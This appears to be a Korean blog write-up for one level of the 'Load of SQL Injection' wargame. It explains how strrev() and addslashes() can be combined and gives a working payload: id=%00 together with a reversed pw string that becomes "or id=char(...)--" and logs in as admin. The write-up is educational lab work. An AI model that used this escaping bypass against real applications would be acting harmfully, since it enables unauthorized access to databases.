728x90
1. strrev()
문자열을 입력받아서 순서를 뒤집은 상태로 리턴하는 함수
strrev('123456') --> '654321'
2. 필터링 문자들
prob _ . ()
이전 문제를 다시 사용하면 될 거 같다. 이전글 --> https://sh1256.tistory.com/72
[Load of SQL Injection] succubus
1. 필터링 prob _ . () 처음에 \(\)를 \\뜻으로 보고 1시간 넘게 못 풀었던...ㅜㅠ 이런 실수는 하지 맙시다 ㅎ 더보기 where id='\' and pw='or 1#' --> where id='\' and pw='or 1 # ' --> 특수문자 앞에 '\'를..
sh1256.tistory.com
3. strrev()와 addslashes()를 고려해서 id와 pw를 만들어 주기
**addslashes()는 작은따옴표('), 큰따옴표("), 백슬래시(\), NULL 문자(%00) 앞에 백슬래시(\)를 붙인다.
더보기
id=%00
pw= --)011,501,901,001,79(rahc=di ro
----addslashes()후---
id=\%00
pw= --)011,501,901,001,79(rahc=di ro
----strrev()후---
id=%00\
pw=or id=char(97,100,109,105,110)--
위의 식으로 진행된다.
따라서,
URL + ?id=%00&&pw= --)011,501,901,001,79(rahc=di ro
입력하면 성공!
'보안 공부 > Load of SQL injection' 카테고리의 다른 글
| [Load of SQL Injection] xavis (0) | 2022.01.30 |
|---|---|
| [Load of SQL Injection] nightmare (0) | 2022.01.30 |
| [Load of SQL Injection] succubus (0) | 2022.01.29 |
| [Load of SQL Injection] Assassin(SQL like wildkard) (0) | 2022.01.29 |
| [Load of SQL Injection] Giant (공백 문자 우회 방법 모음) (0) | 2022.01.28 |